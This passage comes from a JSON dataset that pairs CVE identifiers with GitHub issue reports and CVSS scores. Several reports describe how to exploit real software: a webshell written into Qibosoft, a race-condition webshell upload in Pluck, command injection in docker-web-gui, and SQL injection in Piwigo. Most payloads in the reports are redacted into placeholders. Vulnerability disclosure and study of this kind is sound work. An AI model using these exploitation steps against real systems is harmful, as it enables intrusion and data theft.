  64371. "description": "A Code Injection vulnerability has been found in Qibosoft NUMBERTAG Last year, I found a Code Injection vulnerability in Qibosoft NUMBERTAG submitted China's cnvd, and obtained the CNVD number( CNVD NUMBERTAG URLTAG . Vulnerability demonstration I used the latest version of software in the test, and deployed the Apache server. The PHP version is NUMBERTAG and APITAG version is NUMBERTAG image NUMBERTAG URLTAG \u200b Log in to the administration page and visit the following URL. APITAG \u200b You can see that a webshell has been written to a PHP APITAG can find it in ERRORTAG image NUMBERTAG URLTAG Code audit APITAG \u200b In this function, the writelog function is called to write the APITAG to the file. image NUMBERTAG URLTAG \u200b In the writelog function, you can see that he finally writes the data to ERRORTAG image NUMBERTAG URLTAG \u200b In order to expand the vulnerability,we can use low privilege users to use XSS or CSRF attacks to make the administrator access the vulnerability APITAG vulnerabilities I have submitted in CNVD NUMBERTAG URLTAG",
  64372. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  64373. "severity": "HIGH",
  64374. "baseScore": 7.2,
  64375. "impactScore": 5.9,
  64376. "exploitabilityScore": 1.2
  64377. },
  64378. {
  64379. "CVE_ID": "CVE-2021-27815",
  64380. "Issue_Url_old": "https://github.com/libexif/exif/issues/4",
  64381. "Issue_Url_new": "https://github.com/libexif/exif/issues/4",
  64382. "Repo_new": "libexif/exif",
  64383. "Issue_Created_At": "2021-02-25T07:19:10Z",
  64384. "description": "APITAG in APITAG Project: exif system: ubuntu NUMBERTAG Fuzzer: afl_exif_out_xml FILETAG Command: APITAG asan ERRORTAG gdb CODETAG",
  64385. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  64386. "severity": "MEDIUM",
  64387. "baseScore": 5.5,
  64388. "impactScore": 3.6,
  64389. "exploitabilityScore": 1.8
  64390. },
  64391. {
  64392. "CVE_ID": "CVE-2021-27836",
  64393. "Issue_Url_old": "https://github.com/libxls/libxls/issues/94",
  64394. "Issue_Url_new": "https://github.com/libxls/libxls/issues/94",
  64395. "Repo_new": "libxls/libxls",
  64396. "Issue_Created_At": "2021-02-26T19:58:44Z",
  64397. "description": "libxls APITAG NULL pointer dereference vulnerability. libxls APITAG NULL pointer dereference INTRODUCTION A NULL pointer dereference vulnerability has been detected in the function APITAG when trying to access the rdi register that is NULL at that time. Looking at the code we can realize it is because of trying to access APITAG to that pointer, which is the argument for the function. The argument for APITAG comes from the return value of APITAG : APITAG If we enter the function APITAG : CODETAG We can easily deduce that if either num is less than NUMBERTAG or num is greater than APITAG the conditional won't succeed, thus returning pWS directly without assigning it a heap chunk. As the pointer has been initialized with NULL, a NULL pointer is returned, which will be the argument for the next function, and the program will crash when trying to access it. REPRODUCE To reproduce this crash, the APITAG file has been used with a specially crafted XLS file. The crafted file needs to have no ERRORTAG records to make APITAG be NUMBERTAG ERRORTAG ANALYSIS As I explained in the Introduction section, we need num to be less than NUMBERTAG or greater than APITAG . Having one (or both) of those requirements can trigger the NULL pointer dereference. In APITAG : APITAG The first condition will never fail as i will always be greater or equal to NUMBERTAG Also, i cannot be greater than APITAG as depends on it's value to be incremented. But... what if APITAG is equal to NUMBERTAG Then i will be NUMBERTAG too. In the conditional i won't be less than APITAG , but equal, thus failing the conditional. The function APITAG , responsible for incrementing the APITAG value is never executed with the current APITAG xls file, thus keeping until crash time the value which the program gave it when being initialized at APITAG : APITAG But how do we make the program to not execute APITAG ? We initially need to avoid any ERRORTAG record. 
If we craft an XLS file that does not contain any ERRORTAG record, this code will never be reached: ERRORTAG And APITAG will be NUMBERTAG when reaching the conditional code. The result is a SIGSEGV APITAG fault) interruption crashing the program when trying to access non-mapped memory: CODETAG IMPACT The most common issue with this type of vulnerability is a Denial of Service APITAG once a crash has been triggered as demonstrated above with the crash APITAG SOLUTION A solution for this issue could be adding a pointer check before using it, and changing the actions once a pointer is detected to be NULL. Patch example: ERRORTAG Obviously, the pointer is used multiple times in the code, so having it NULL is something not expected. A more complex patch is needed to avoid unexpected results for the next functions to be executed instead of just returning if a NULL pointer is detected. Anyway, a better solution for this patch is to update the conditional at APITAG to this: APITAG This time, if num is equal to APITAG the heap chunk will be returned, avoiding a NULL pointer being returned.",
  64398. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  64399. "severity": "MEDIUM",
  64400. "baseScore": 6.5,
  64401. "impactScore": 3.6,
  64402. "exploitabilityScore": 2.8
  64403. },
  64404. {
  64405. "CVE_ID": "CVE-2021-27847",
  64406. "Issue_Url_old": "https://github.com/libvips/libvips/issues/1236",
  64407. "Issue_Url_new": "https://github.com/libvips/libvips/issues/1236",
  64408. "Repo_new": "libvips/libvips",
  64409. "Issue_Created_At": "2019-02-20T13:19:56Z",
  64410. "description": "bugs found by our scanner. Hi, we developed a taint analysis based static analysis tool named Vanguard. It could prognosis potential vulnerabilities by identifying security sensitive operations (e.g. divide zero, mod zero, array index access, and sensitive function calls) without proper checks for their operands. Some code locations are listed in the following. We think these locations maybe bugs after our manual analysis. Please check them, and add precondition checks if necessary. APITAG Zero NUMBERTAG in function APITAG , zoom.c L NUMBERTAG L NUMBERTAG L NUMBERTAG URLTAG CODETAG APITAG CODETAG Divisor: zoom >xfac, zoom >yfac Result: Could be NUMBERTAG Please Check NUMBERTAG in function APITAG , point.c L NUMBERTAG URLTAG CODETAG Divisor: range Result: Could be NUMBERTAG Please Check NUMBERTAG in function APITAG , eye.c L NUMBERTAG URLTAG APITAG Divisor: h Result: Could be NUMBERTAG Please Check NUMBERTAG in function APITAG , mask.c L NUMBERTAG URLTAG APITAG Divisor: half_width, half_height Result: Could be NUMBERTAG Please Check. 
Array Index Bound NUMBERTAG in function APITAG , gamma.c L NUMBERTAG URLTAG APITAG Array expression: vips_gamma_maxval in APITAG needs bound checking NUMBERTAG APITAG APITAG APITAG APITAG needs bound checking NUMBERTAG APITAG APITAG APITAG APITAG needs bound checking NUMBERTAG APITAG APITAG Sensitive Function Call NUMBERTAG in function APITAG ,[ unpack_seek.c L NUMBERTAG URLTAG APITAG memcpy] is a security sensitive function using tainted data: [wphdr NUMBERTAG in function APITAG ,[ tiff2vips.c L NUMBERTAG URLTAG APITAG memcpy] is a security sensitive function using tainted data: [len NUMBERTAG in function APITAG ,[ sinkscreen.c L NUMBERTAG URLTAG APITAG memcpy] is a security sensitive function using tainted data: [len NUMBERTAG in function APITAG ,[ region.c L NUMBERTAG L NUMBERTAG URLTAG APITAG APITAG [memset] is a security sensitive function using tainted data: [wd ] [memcpy] is a security sensitive function using tainted data: [wd ]",
  64411. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  64412. "severity": "MEDIUM",
  64413. "baseScore": 6.5,
  64414. "impactScore": 3.6,
  64415. "exploitabilityScore": 2.8
  64416. },
  64417. {
  64418. "CVE_ID": "CVE-2021-27884",
  64419. "Issue_Url_old": "https://github.com/YMFE/yapi/issues/2117",
  64420. "Issue_Url_new": "https://github.com/ymfe/yapi/issues/2117",
  64421. "Repo_new": "ymfe/yapi",
  64422. "Issue_Created_At": "2021-02-23T14:55:07Z",
  64423. "description": "Potential security vulnerability in APITAG APITAG Security Lab (GHSL) Vulnerability Report: APITAG Summary Weak random number generator is used to sign JSON Web Token (JWT). Product APITAG URLTAG Tested Version The latest commit to the date NUMBERTAG e1f NUMBERTAG URLTAG . Details JWT signing Function APITAG URLTAG is using a cryptographically insecure pseudo random number generator APITAG to create a randomly looking string that later is used to sign and verify issued tokens: APITAG When a new user is created the APITAG function is used to generate a passsalt . It is used as a salt to hash the password and as the secret to sign a JWT that authenticates the user: CODETAG The APITAG returns a floating point number that is more than or equal to NUMBERTAG and less than NUMBERTAG The call to APITAG formats the number as base NUMBERTAG For example, APITAG gets encoded as APITAG . The first two characters are trimmed and the result is APITAG . The generated secret is mostly NUMBERTAG characters long and consists of numbers and lowercase Latin alphabet characters only. Since the trimmed part is always APITAG the calculation is completely reversible. The weakness of cryptographically insecure pseudo random number generators is that given some number of observed values the internal state of the generator can be recreated that reveals the numbers generated in the past or allows calculation of the future outputs. The internal state of the current implementation of APITAG in FILETAG (a modification of APITAG algorithm) can be recreated from three observed consecutive values. To get the values an attacker may automate the user creation process to get three new user tokens rapidly, then run a brute force attack on the JWT HMAC signatures. 
This still should not be feasible to do in a reasonable time on a single machine like: CODETAG However a very rough estimation shows that by using cloud computing the attack could cost from NUMBERTAG to NUMBERTAG to break the tokens APITAG three values versus one value has very little penalty as cracking machines are optimized for multiple hashes and cracking a single hash doesn't fully utilize computer resources). Please notice that the token's NUMBERTAG days expiration time doesn't put a limit on the attack as the target is the passsalt value used to sign the token. Impact After successfully brute forcing the three pseudo random values the attacker may recreate the passsalt values that are used to sign tokens of other users. It may be argued if there is an incentive to spend this amount of resources, but GPUs get better all the time. Remediation Use APITAG to get at least NUMBERTAG bytes random value in APITAG . Consider not using the passsalt for signing JWT, but using a NUMBERTAG bits secret from the server configuration environment. Credit This issue was discovered and reported by GHSL team member MENTIONTAG APITAG Loba\u010devski) URLTAG . Contact You can contact the GHSL team at APITAG , please include a reference to APITAG in any communication regarding this issue. Disclosure Policy This report is subject to our coordinated disclosure policy URLTAG .",
  64424. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
  64425. "severity": "MEDIUM",
  64426. "baseScore": 5.1,
  64427. "impactScore": 2.5,
  64428. "exploitabilityScore": 2.5
  64429. },
  64430. {
  64431. "CVE_ID": "CVE-2021-27884",
  64432. "Issue_Url_old": "https://github.com/YMFE/yapi/issues/2263",
  64433. "Issue_Url_new": "https://github.com/ymfe/yapi/issues/2263",
  64434. "Repo_new": "ymfe/yapi",
  64435. "Issue_Created_At": "2021-07-15T11:41:16Z",
  64436. "description": "YAPI NUMBERTAG days\u6f0f\u6d1e\uff0c\u53d1\u73b0\u670d\u52a1\u5668\u4ee3\u7801\u5360\u6ee1\u4e86. \u7248\u672c\u53f7 ~ \u4ec0\u4e48\u95ee\u9898 ~ \u5982\u4f55\u590d\u73b0\u6b64\u95ee\u9898 ~ APITAG \u4ec0\u4e48\u6d4f\u89c8\u5668 ~ APITAG Windows, APITAG",
  64437. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
  64438. "severity": "MEDIUM",
  64439. "baseScore": 5.1,
  64440. "impactScore": 2.5,
  64441. "exploitabilityScore": 2.5
  64442. },
  64443. {
  64444. "CVE_ID": "CVE-2021-27886",
  64445. "Issue_Url_old": "https://github.com/rakibtg/docker-web-gui/issues/23",
  64446. "Issue_Url_new": "https://github.com/rakibtg/docker-web-gui/issues/23",
  64447. "Repo_new": "rakibtg/docker-web-gui",
  64448. "Issue_Created_At": "2021-01-31T02:00:31Z",
  64449. "description": "Security: lack of input validation in APIs leads to command injection. For example, making GET requests such as the following results in arbitrary commands being executed on the server, outside of the intended docker process only. This is otherwise known as a remote command injection bug (especially since FILETAG listens on the network interface by default, accessible by anyone on the network, even though the intended access is localhost). > URLTAG ERRORTAG For example executing the id command may return: APITAG Some of the other APIs seem vulnerable to injection as well. Recommended easiest fix would be the following NUMBERTAG allow only alphanumeric characters in the parameters (strings that actually look like container and image names NUMBERTAG have a list of allowed commands such as start/stop, etc. Ensure this simple validation routine validates the user input before concatenating parameters and calling APITAG . Return a \"bad parameter\" error message if the validation doesn't pass. Additional references for hardening the code FILETAG URLTAG",
  64450. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64451. "severity": "CRITICAL",
  64452. "baseScore": 9.8,
  64453. "impactScore": 5.9,
  64454. "exploitabilityScore": 3.9
  64455. },
  64456. {
  64457. "CVE_ID": "CVE-2021-27935",
  64458. "Issue_Url_old": "https://github.com/AdguardTeam/AdGuardHome/issues/2470",
  64459. "Issue_Url_new": "https://github.com/adguardteam/adguardhome/issues/2470",
  64460. "Repo_new": "adguardteam/adguardhome",
  64461. "Issue_Created_At": "2020-12-21T18:37:22Z",
  64462. "description": "Hash of the password stored in the cookies. It [seems]( URLTAG ) that the username as well as the bcrypt'ed password have their sha NUMBERTAG stored in the cookie. This is a bit worrying, since an attacker able to get the cookie would not only gain access to AGH, but also be able to brute-force the password offline. A possible way to address this would be to use a random string instead of APITAG .",
  64463. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  64464. "severity": "HIGH",
  64465. "baseScore": 7.5,
  64466. "impactScore": 3.6,
  64467. "exploitabilityScore": 3.9
  64468. },
  64469. {
  64470. "CVE_ID": "CVE-2021-27973",
  64471. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1352",
  64472. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1352",
  64473. "Repo_new": "piwigo/piwigo",
  64474. "Issue_Created_At": "2021-03-01T11:44:16Z",
  64475. "description": "SQL injection in settings language in version NUMBERTAG Login with admin or users can set the language NUMBERTAG Send the following payload and follow redirect: db user : URLTAG FILETAG db version: URLTAG FILETAG",
  64476. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  64477. "severity": "HIGH",
  64478. "baseScore": 7.2,
  64479. "impactScore": 5.9,
  64480. "exploitabilityScore": 1.2
  64481. },
  64482. {
  64483. "CVE_ID": "CVE-2021-27983",
  64484. "Issue_Url_old": "https://github.com/maxsite/cms/issues/430",
  64485. "Issue_Url_new": "https://github.com/maxsite/cms/issues/430",
  64486. "Repo_new": "maxsite/cms",
  64487. "Issue_Created_At": "2021-03-02T02:16:46Z",
  64488. "description": "Remote Code Execution Vulnerability In APITAG CMS NUMBERTAG After the administrator logged in, open the APITAG page. Select any of the files, change the contents to poc and save. poc\uff1a APITAG FILETAG Open the APITAG page and the code has been executed. FILETAG From: EMAILTAG",
  64489. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64490. "severity": "CRITICAL",
  64491. "baseScore": 9.8,
  64492. "impactScore": 5.9,
  64493. "exploitabilityScore": 3.9
  64494. },
  64495. {
  64496. "CVE_ID": "CVE-2021-27984",
  64497. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/98",
  64498. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/98",
  64499. "Repo_new": "pluck-cms/pluck",
  64500. "Issue_Created_At": "2021-03-03T16:03:21Z",
  64501. "description": "Pluck NUMBERTAG admin background exists a remote command execution vulnerability when uploading files. I uploaded any file in the \"manage files\" section, here I uploaded a NUMBERTAG jpg\". FILETAG Found two files at the upload folder. FILETAG Looked at the source code for the delete file function. On lines NUMBERTAG and NUMBERTAG of PATHTAG the logic is that the file \".htaccess\" is not allowed to be deleted. But it can be bypassed. FILETAG I clicked on the delete button on the page for NUMBERTAG jpg\" and sniffered the packet. FILETAG Change the value of the request parameter \"var\" to APITAG (the suffix name is not case sensitive in Windows) FILETAG APITAG is already in the trash. FILETAG The \".htaccess\" in the upload folder has been copied to the trash folder. FILETAG Looked at the source code for the upload function, lines NUMBERTAG to NUMBERTAG of PATHTAG FILETAG The code logic is as follows NUMBERTAG First check if the file suffix is \".htaccess NUMBERTAG then check if the file suffix is in the blacklist NUMBERTAG If the suffix is in the blacklist, add the suffix \".txt\" for renaming and give permission NUMBERTAG If the suffix name is not in the blacklist, then give permission directly. Use race condition for attacks. First I create a APITAG file. poc: APITAG FILETAG Upload the file and sniffer a packet of the upload request and send it to intruder (add variable a NUMBERTAG to keep sniffering the request packet). FILETAG Then sniffer a packet that accesses the file and send it to intruder. FILETAG Both intruder types are selected as APITAG and the number is NUMBERTAG FILETAG Threads are set to NUMBERTAG FILETAG Start the attack, when the status of the request to access the file is NUMBERTAG it means that the file was uploaded successfully and the code was executed. FILETAG FILETAG Upload webshell with race condition and successfully gain access to the server. 
exploit\uff1a FILETAG FILETAG APITAG the \".php\" file only exists when the race condition is in place, if the race condition is stopped the \".php\" file will still be a \". APITAG file, so the shell will disconnect. The shell will then disconnect. (So maintaining permissions requires that race condition be maintained at all times) From: EMAILTAG",
  64502. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64503. "severity": "HIGH",
  64504. "baseScore": 8.1,
  64505. "impactScore": 5.9,
  64506. "exploitabilityScore": 2.2
  64507. },
  64508. {
  64509. "CVE_ID": "CVE-2021-28021",
  64510. "Issue_Url_old": "https://github.com/nothings/stb/issues/1108",
  64511. "Issue_Url_new": "https://github.com/nothings/stb/issues/1108",
  64512. "Repo_new": "nothings/stb",
  64513. "Issue_Created_At": "2021-03-04T10:19:50Z",
  64514. "description": "heap overflow in APITAG heap overflow by a craft jpeg file in APITAG poc FILETAG asan report: ERRORTAG",
  64515. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  64516. "severity": "HIGH",
  64517. "baseScore": 7.8,
  64518. "impactScore": 5.9,
  64519. "exploitabilityScore": 1.8
  64520. },
  64521. {
  64522. "CVE_ID": "CVE-2021-28040",
  64523. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1953",
  64524. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1953",
  64525. "Repo_new": "ossec/ossec-hids",
  64526. "Issue_Created_At": "2021-02-23T14:37:16Z",
  64527. "description": "os_xml APITAG Uncontrolled recursion vulnerability leading to APITAG (SIGSEGV). os_xml APITAG Uncontrolled recursion vulnerability INTRODUCTION An Uncontrolled Recursion vulnerability has been identified in the APITAG XML parsing library used by OSSEC. Through the APITAG code, a flaw has been identified in APITAG that allows non defined recursion cycles, thus finally trying to access non mapped memory once the stack end has been reached. The payload consists on a number of APITAG which will trigger the recursion and finally ending it with APITAG . REPRODUCE To reproduce this vulnerability, compile the APITAG and open the payload file with it. CODETAG If we compile APITAG with ASAN APITAG this is the output we are given: ERRORTAG As we can see an unlimited number of recursion calls can be performed, ending on a SIGSEGV APITAG fault). Attention! : If a SIGSEGV is not triggered, try adding more APITAG in the payload. The segmentation fault error is because we reach the end of the stack, so it depends on the offset until the end of it, which may differ in your situation. ANALYSIS There exists a non limited recursion in the APITAG function: ERRORTAG If we debug it after specifying the crash file as argument: ERRORTAG A SIGSEGV APITAG fault) happens when trying to access invalid memory as the rsp register contains an address that is not mapped. IMPACT The most common issue with this type of vulnerability is a Denial of Service APITAG once a crash has been triggered as demonstrated above with the crash APITAG SOLUTION The best solution to this vulnerability is implementing a code that controls the number of allowed recursions, or redesigning the methodology to loop over the XML tags using a while or for loop instead of recursing if the number of needed iterations is huge, resulting in a Stack exhaustion. The APITAG is performed due to the creation of a new frame in the stack for each new function being called. 
Creating a large number of frames, after many iterations, consumes the available stack memory, and once non-mapped memory is reached a segmentation fault interruption will happen. An important factor that greatly decreases the number of iterations needed to trigger the bug is the existence of three big stack buffers in the recursive function. Another useful change would be using dynamic memory with APITAG or APITAG when a big amount of space is needed; it can also be reused instead of creating a chunk or stack buffer for each function call.",
  64528. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64529. "severity": "HIGH",
  64530. "baseScore": 7.5,
  64531. "impactScore": 3.6,
  64532. "exploitabilityScore": 3.9
  64533. },
  64534. {
  64535. "CVE_ID": "CVE-2021-28070",
  64536. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/31",
  64537. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/31",
  64538. "Repo_new": "popojicms/popojicms",
  64539. "Issue_Created_At": "2021-03-06T07:06:24Z",
  64540. "description": "I found a CSRF vulnerability to delete user. One: use CSRF vulnerability to delete user Vulnerability details: When the administrator logs in, opening the webpage will automatically delete the specified user. Vulnerability url: URLTAG Vulnerability POC: ERRORTAG",
  64541. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  64542. "severity": "MEDIUM",
  64543. "baseScore": 4.3,
  64544. "impactScore": 1.4,
  64545. "exploitabilityScore": 2.8
  64546. },
  64547. {
  64548. "CVE_ID": "CVE-2021-28099",
  64549. "Issue_Url_old": "https://github.com/Netflix/hollow/issues/502",
  64550. "Issue_Url_new": "https://github.com/netflix/hollow/issues/502",
  64551. "Repo_new": "netflix/hollow",
  64552. "Issue_Created_At": "2021-01-24T16:49:45Z",
  64553. "description": "Please open a security advisory. Hello Netflix Hollow Team, I'd like to report a potential security vulnerability in Netflix hollow. Please open a private security advisory so we can discuss the issue. URLTAG",
  64554. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
  64555. "severity": "MEDIUM",
  64556. "baseScore": 4.4,
  64557. "impactScore": 2.5,
  64558. "exploitabilityScore": 1.8
  64559. },
  64560. {
  64561. "CVE_ID": "CVE-2021-28119",
  64562. "Issue_Url_old": "https://github.com/xanderfrangos/twinkle-tray/issues/142",
  64563. "Issue_Url_new": "https://github.com/xanderfrangos/twinkle-tray/issues/142",
  64564. "Repo_new": "xanderfrangos/twinkle-tray",
  64565. "Issue_Created_At": "2021-03-09T16:37:44Z",
  64566. "description": "Potential command execution vulnerability introduced by unsafe IPC exposure. Hi, Great work! We did a security analysis on the app and found that the risky APITAG is directly exposed to the unsafe renderer process. This may allow remote attackers to abuse sensitive methods in the (privileged) main process by crafting malicious IPC messages. Vulnerability Details The following code shows how a preload script exposes IPC. URLTAG We do find exploitable IPC endpoints. e.g., If the attacker sends a malicious msg to APITAG channel, he may execute arbitrary commands via APITAG . URLTAG Mitigation enforce security checks when receiving events on sensitive channels (e.g., check if received URL is legal before APITAG avoid directly exposing APITAG to untrusted domains.",
  64567. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64568. "severity": "CRITICAL",
  64569. "baseScore": 9.8,
  64570. "impactScore": 5.9,
  64571. "exploitabilityScore": 3.9
  64572. },
  64573. {
  64574. "CVE_ID": "CVE-2021-28122",
  64575. "Issue_Url_old": "https://github.com/open5gs/open5gs/issues/837",
  64576. "Issue_Url_new": "https://github.com/open5gs/open5gs/issues/837",
  64577. "Repo_new": "open5gs/open5gs",
  64578. "Issue_Created_At": "2021-03-10T13:18:52Z",
  64579. "description": "Authentication Bypass in Webui. An unauthenticated user can utilize information provided by the login page of the webui component to craft HTTP requests that will allow that user to create, read, update, and delete entries in the subscriber database. This includes the ability to add administrative users, PATHTAG subscribers, and PATHTAG profiles. Properly crafted HTTP GET and DELETE requests with empty bodies will cause data to be returned or deleted on the following routes: URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG Properly crafted HTTP POST,PUT and PATCH requests with properly crafted bodies will cause data to be inserted or updated on the following routes: URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG This is caused by the configuration of express js in FILETAG . This should be updated to correctly validate the user making the API calls.",
  64580. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64581. "severity": "CRITICAL",
  64582. "baseScore": 9.8,
  64583. "impactScore": 5.9,
  64584. "exploitabilityScore": 3.9
  64585. },
  64586. {
  64587. "CVE_ID": "CVE-2021-28128",
  64588. "Issue_Url_old": "https://github.com/strapi/strapi/issues/9657",
  64589. "Issue_Url_new": "https://github.com/strapi/strapi/issues/9657",
  64590. "Repo_new": "strapi/strapi",
  64591. "Issue_Created_At": "2021-03-09T17:43:20Z",
  64592. "description": "Ask for password . Feature request Make every \"update user password\" process in the Admin panel safer by asking to confirm the currently active password Please describe your feature request [ ] I have created my request on the Product Board before I submitted this issue [x] I have looked at all the other requests on the Product Board before I submitted this issue Summary It is currently possible to update a user's password without having to confirm their currently active password. A general improvement would be to ask for some current active password confirmation (at least the one of the user asking for a change) before processing the update. Why is it needed? The user password update process should be more committing to prevent unmeant or malicious changing actions. Suggested solution(s) Ask for a current password confirmation before updating a user's password through the admin panel Related issue(s)/PR(s)",
  64593. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  64594. "severity": "HIGH",
  64595. "baseScore": 8.1,
  64596. "impactScore": 5.2,
  64597. "exploitabilityScore": 2.8
  64598. },
  64599. {
  64600. "CVE_ID": "CVE-2021-28134",
  64601. "Issue_Url_old": "https://github.com/AkashRajpurohit/clipper/issues/13",
  64602. "Issue_Url_new": "https://github.com/akashrajpurohit/clipper/issues/13",
  64603. "Repo_new": "akashrajpurohit/clipper",
  64604. "Issue_Created_At": "2021-03-09T01:33:30Z",
  64605. "description": "Potential Command Execution vulnerabilities introduced by FILETAG . Hi, We found that APITAG introduces dangerous API APITAG for arbitrary access on unsafe renderer process. This may lead to remote command execution. We suggest that a URL check should be enforced at L NUMBERTAG which enforces an allowlist on trusted urls. URLTAG",
  64606. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64607. "severity": "CRITICAL",
  64608. "baseScore": 9.8,
  64609. "impactScore": 5.9,
  64610. "exploitabilityScore": 3.9
  64611. },
  64612. {
  64613. "CVE_ID": "CVE-2021-28154",
  64614. "Issue_Url_old": "https://github.com/camunda/camunda-modeler/issues/2143",
  64615. "Issue_Url_new": "https://github.com/camunda/camunda-modeler/issues/2143",
  64616. "Repo_new": "camunda/camunda-modeler",
  64617. "Issue_Created_At": "2021-03-09T16:17:42Z",
  64618. "description": "Arbitrary filesystem manipulation vulnerability introduced by ipc exposure. APITAG the Bug__ Hi, We found that APITAG directly exposes a risky APITAG instance to the unsafe renderer process, which enables a remote attacker to abuse sensitive methods in the main process by crafting malicious ipc messages. I notice that the app has already disabled node integration in unsafe renderers( URLTAG which is good. However, such direct IPC export may re-expose many sensitive primitives to the attacker. Here is the exposure site. URLTAG By sending a message to the APITAG channel, the attacker may read and write malicious content to the user filesystem. URLTAG APITAG Behavior__ I could think of two possible solutions: enforce security checks when receiving events on sensitive channels (e.g., file read/write). avoid directly exposing APITAG to untrusted domains.",
  64619. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  64620. "severity": "CRITICAL",
  64621. "baseScore": 9.1,
  64622. "impactScore": 5.2,
  64623. "exploitabilityScore": 3.9
  64624. },
  64625. {
  64626. "CVE_ID": "CVE-2021-28161",
  64627. "Issue_Url_old": "https://github.com/eclipse-theia/theia/issues/8794",
  64628. "Issue_Url_new": "https://github.com/eclipse-theia/theia/issues/8794",
  64629. "Repo_new": "eclipse-theia/theia",
  64630. "Issue_Created_At": "2020-11-28T23:36:58Z",
  64631. "description": "XSS in Debug Console FILETAG (L NUMBERTAG FILETAG I think this issue is similar to NUMBERTAG Steps to Reproduce: See also the FILETAG . FILETAG Additional Information Theia Version: Theia NUMBERTAG Questions Theia is an important open source project, but it hasn't set a Github security policy. Should it have one?",
  64632. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  64633. "severity": "MEDIUM",
  64634. "baseScore": 6.1,
  64635. "impactScore": 2.7,
  64636. "exploitabilityScore": 2.8
  64637. },
  64638. {
  64639. "CVE_ID": "CVE-2021-28162",
  64640. "Issue_Url_old": "https://github.com/eclipse-theia/theia/issues/7283",
  64641. "Issue_Url_new": "https://github.com/eclipse-theia/theia/issues/7283",
  64642. "Repo_new": "eclipse-theia/theia",
  64643. "Issue_Created_At": "2020-03-05T15:45:25Z",
  64644. "description": "Javascript injection via notification messages. Description In the notification messages there is no HTML escaping, so Javascript code can run. I'm not sure, but I think the issue is in PATHTAG URLTAG APITAG In an Electron app arbitrary JS code can lead to dangerous exploits. Reproduction Steps Create a new project and create a new debugger configuration file APITAG In the type field write the Javascript payload (e.g. APITAG ) Press F5 to launch the debugger and see the alert box FILETAG OS and Theia version: Ubuntu NUMBERTAG Theia Electron Example NUMBERTAG I think this bug is a vulnerability; I can exfiltrate data from the victim's computer by using JS. Here is a proof of concept video. FILETAG",
  64645. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  64646. "severity": "MEDIUM",
  64647. "baseScore": 6.1,
  64648. "impactScore": 2.7,
  64649. "exploitabilityScore": 2.8
  64650. },
  64651. {
  64652. "CVE_ID": "CVE-2021-28167",
  64653. "Issue_Url_old": "https://github.com/eclipse/openj9/issues/12016",
  64654. "Issue_Url_new": "https://github.com/eclipse-openj9/openj9/issues/12016",
  64655. "Repo_new": "eclipse-openj9/openj9",
  64656. "Issue_Created_At": "2021-02-21T22:28:06Z",
  64657. "description": "APITAG is sometimes invoked after a static method has been invoked. ERRORTAG Consider the test case below: ERRORTAG and the output is: ERRORTAG We find that APITAG was invoked after APITAG had been invoked. If we run it with hotspot, the result is: ERRORTAG",
  64658. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
  64659. "severity": "MEDIUM",
  64660. "baseScore": 6.5,
  64661. "impactScore": 2.5,
  64662. "exploitabilityScore": 3.9
  64663. },
  64664. {
  64665. "CVE_ID": "CVE-2021-28170",
  64666. "Issue_Url_old": "https://github.com/eclipse-ee4j/el-ri/issues/155",
  64667. "Issue_Url_new": "https://github.com/jakartaee/expression-language/issues/155",
  64668. "Repo_new": "jakartaee/expression-language",
  64669. "Issue_Created_At": "2021-04-14T18:51:51Z",
  64670. "description": "GHSL NUMBERTAG Bypass input sanitization of EL expressions . Github posted this publicly about NUMBERTAG weeks ago URLTAG",
  64671. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  64672. "severity": "MEDIUM",
  64673. "baseScore": 5.3,
  64674. "impactScore": 1.4,
